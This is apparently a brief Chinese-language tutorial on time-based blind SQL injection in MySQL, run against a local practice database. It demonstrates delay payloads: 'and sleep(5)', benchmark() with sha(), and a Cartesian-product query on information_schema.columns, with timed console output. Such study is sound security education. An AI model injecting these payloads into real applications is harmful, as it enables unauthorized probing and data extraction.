MySQL_延时注入

MySQL_延时注入

1.sleep()

1
2
3
4
5
6
7
8
9
10
11
12
MariaDB [security]> select * from users where id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and sleep(5);
Empty set (5.00 sec)

MariaDB [security]>

2.benchmark()

BENCHMARK(count,expr)
BENCHMARK()函数重复countTimes次执行表达式expr,它可以用于计时MySQL处理表达式有多快。结果值总是0。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
MariaDB [security]> select benchmark(1000000,sha(1));
+---------------------------+
| benchmark(1000000,sha(1)) |
+---------------------------+
| 0 |
+---------------------------+
1 row in set (0.29 sec)

MariaDB [security]> select benchmark(10000000,sha(1));
+----------------------------+
| benchmark(10000000,sha(1)) |
+----------------------------+
| 0 |
+----------------------------+
1 row in set (2.81 sec)

MariaDB [security]> select benchmark(100000000,sha(1));
+-----------------------------+
| benchmark(100000000,sha(1)) |
+-----------------------------+
| 0 |
+-----------------------------+
1 row in set (28.73 sec)

MariaDB [security]> select * from users where id = 1 and benchmark(10000000,sha(1));
Empty set (14.46 sec)

MariaDB [security]>

3.笛卡尔积

1
select if(1=1,(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0);